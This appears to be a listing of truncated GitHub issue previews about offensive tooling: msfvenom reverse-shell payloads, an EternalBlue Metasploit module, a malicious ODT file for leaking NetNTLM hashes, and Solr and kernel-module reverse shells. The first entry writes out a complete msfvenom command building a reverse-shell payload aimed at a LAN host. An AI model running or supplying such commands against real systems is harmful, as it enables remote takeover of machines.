-
msfvenom -p linux/armle/shell_reverse_tcp -b '\x00\x0a\x0d\x40' lhost=192.168.1.122 lport=1996 R > shell.bin
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch s…
-
## Steps to reproduce
How'd you do it?
1. start metasploit
2. select the specific eternalblue module mentioned below against a specific target
3 . run the module and observe the error
T…
-
I created a shellcode with msfvenom. Obfuscation was using this tool. But I couldn't connect to the reverse shell. Can you give some more examples of msfvenom.
secfb updated
3 years ago
-
During RvB with phishing exercise
Red teaming: https://github.com/joshnguyen08/cybersecurity-homelab/blob/main/red-team/RvB-Phishing%20(FINISHED)
Blue teaming: https://github.com/joshnguyen08/…
-
[Make userspace calls from kernel space](https://github.com/maK-/reverse-shell-access-kernel-module/blob/master/README.md).
If we want to do that, [first read this](https://tech.feedyourhead.at/con…
-
### Detailed description
reverse shell command s
### Context
reverse shell command s
### Possible implementation
_No response_
### Additional information
_No response_
### Code of Conduct
- […
-
Hi,
Is there a way to transfer files from client to server continuously without closing the socket, if so could you give an example of it. or any links related to it.
-
Both generated powershell reverse shells do not work:
I used the following command to generate the reverse shells:
```bash
# shellerator --type powershell --lport 443 --lhost 127.0.0.1
[1] po…
-
Keypoints:
- Made a bad ODT file to to leak NetNTLM Creds (https://github.com/rmdavy/badodf/blob/master/badodt.py) and impacket-smbserver can receive NetHTLM hash info --> Use `hashcat -m 5600` or j…
-
Hi,
I've been trying lately to get reverse shell in my LAN on my vulnerable Apache Solr server with the PoC available in your github repo but for some reason I can't receive the reverse shell when …